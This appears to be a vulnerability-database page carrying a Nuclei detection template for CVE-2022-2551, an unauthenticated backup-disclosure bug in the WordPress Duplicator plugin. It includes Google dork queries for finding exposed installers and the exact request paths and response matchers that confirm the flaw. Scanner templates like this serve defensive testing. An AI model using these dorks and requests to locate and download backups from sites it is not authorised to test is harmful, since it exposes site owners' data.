Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-2551HistorySep 03, 2022 - 7:19 p.m.
WordPress Duplicator <1.4.7 - Authentication Bypass
2022-09-0319:19:55
ProjectDiscovery
github.com
4
cve2022
wordpress
plugin
vulnerability
authentication
bypass
disclosure
wpscan
snapcreek
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
0.664
Percentile
97.9%
WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.
id: CVE-2022-2551
info:
name: WordPress Duplicator <1.4.7 - Authentication Bypass
author: LRTK-CODER
severity: high
description: |
WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site.
remediation: Fixed in version 1.4.7.1.
reference:
- https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0
- https://wordpress.org/plugins/duplicator/
- https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551
- https://nvd.nist.gov/vuln/detail/CVE-2022-2551
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-2551
cwe-id: CWE-425
epss-score: 0.66448
epss-percentile: 0.97927
cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: snapcreek
product: duplicator
framework: wordpress
google-query:
- inurl:/backups-dup-lite/dup-installer/
- inurl:"/wp-content/plugins/duplicator"
tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1"
- "{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a href='../installer.php'>restart this install process</a>"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100bcea4e5831adc1e51e0fa302d4ca1cc7e411e57ac74e64cfb714efb6c67a19c102201a030d6b966593b3c95b414db9a89cdf3fdf2be1094d0fa8cbcaa52b1623f7fe:922c64590222798bb761d5b6d8e72950Related
prion
prion
Design/Logic Flaw
2022-08-22 15:15:00
patchstack
patchstack
packetstorm
packetstorm
WordPress Duplicator 1.4.6 Backup Disclosure
2022-08-01 00:00:00
wpexploit
wpexploit
Duplicator < 1.4.7 - Unauthenticated Backup Download
2022-08-01 00:00:00
exploitdb
exploitdb
WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
2022-08-01 00:00:00
nvd
nvd
CVE-2022-2551
2022-08-22 15:15:15
cve
cve
CVE-2022-2551
2022-08-22 15:15:15
zdt
zdt
wpvulndb
wpvulndb
Duplicator < 1.4.7 - Unauthenticated Backup Download
2022-08-01 00:00:00
cvelist
cvelist
CVE-2022-2551 Duplicator < 1.4.7 - Unauthenticated Backup Download
2022-08-22 15:03:52
openvas
openvas
WordPress Duplicator Plugin < 1.4.7 Information Disclosure Vulnerability
2022-08-23 00:00:00
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
0.664
Percentile
97.9%
Related for NUCLEI:CVE-2022-2551